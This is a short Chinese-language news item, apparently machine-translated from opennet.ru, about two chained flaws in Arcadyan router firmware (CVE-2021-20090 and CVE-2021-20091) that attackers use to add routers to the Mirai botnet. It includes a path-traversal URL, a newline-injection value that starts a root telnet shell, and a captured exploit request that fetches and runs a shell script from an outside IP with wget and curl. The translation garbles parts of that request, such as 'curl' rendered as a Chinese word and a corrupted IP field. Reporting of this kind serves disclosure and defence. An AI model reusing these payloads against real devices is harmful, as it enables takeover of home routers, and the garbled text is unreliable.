網路上記錄了針對家庭路由器的大規模攻擊,這些路由器的韌體使用 Arcadyan 公司的 HTTP 伺服器實現。為了獲得對設備的控制權,結合使用了兩個漏洞,允許使用 root 權限遠端執行任意程式碼。這個問題影響了 Arcadyan、ASUS 和 Buffalo 的相當廣泛的 ADSL 路由器,以及 Beeline 品牌(該問題在 Smart Box Flash 中得到確認)、德國電信、Orange、O2、Telus、Verizon、Vodafone 和其他電信運營商。值得注意的是,該問題在 Arcadyan 韌體中已存在 10 多年,在此期間已成功遷移到來自 20 個不同製造商的至少 17 個裝置型號。
第一個漏洞 CVE-2021-20090 使得無需身份驗證即可存取任何 Web 介面腳本。該漏洞的本質是在Web介面中,某些發送映像、CSS檔案和JavaScript腳本的目錄無需身份驗證即可存取。在這種情況下,將使用初始遮罩檢查允許無需身份驗證即可存取的目錄。韌體會阻止在路徑中指定“../”字元前往父目錄,但會跳過使用“..%2f”組合。因此,當發送「http://192.168.1.1/images/..%2findex.htm」等請求時,可以開啟受保護的頁面。
第二個漏洞 CVE-2021-20091 允許經過驗證的使用者透過向 apply_abstract.cgi 腳本發送特殊格式的參數來更改設備的系統設置,該腳本不會檢查參數中是否存在換行符。例如,在執行 ping 操作時,攻擊者可以在建立設定檔 /tmp/etc/config/ 時在檢查 IP 位址的欄位和腳本中指定值「192.168.1.2%0AARC_SYS_TelnetdEnable=1」 .glbcfg,會將行「 AARC_SYS_TelnetdEnable=1”寫入其中“,這將啟動telnetd 伺服器,該伺服器提供具有root 權限的不受限制的命令shell 存取。同樣,透過設定AARC_SYS參數,您可以執行系統上的任何程式碼。第一個漏洞使得可以透過以「/images/..%2fapply_abstract.cgi」存取腳本來執行有問題的腳本,而無需進行身份驗證。
要利用漏洞,攻擊者必須能夠向運行 Web 介面的網路連接埠發送請求。從攻擊傳播的動態來看,許多運營商保留了外部網路對其設備的存取權限,以簡化支援服務對問題的診斷。如果對介面的存取僅限於內部網絡,則可以使用「DNS重新綁定」技術從外部網路進行攻擊。漏洞已被積極用於將路由器連接到 Mirai 殭屍網路:POST /images/..%2fapply_abstract.cgi HTTP/1.1 連接:關閉用戶代理:Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipad212.192.241.7日。 %0A ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh;捲曲+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
來源: opennet.ru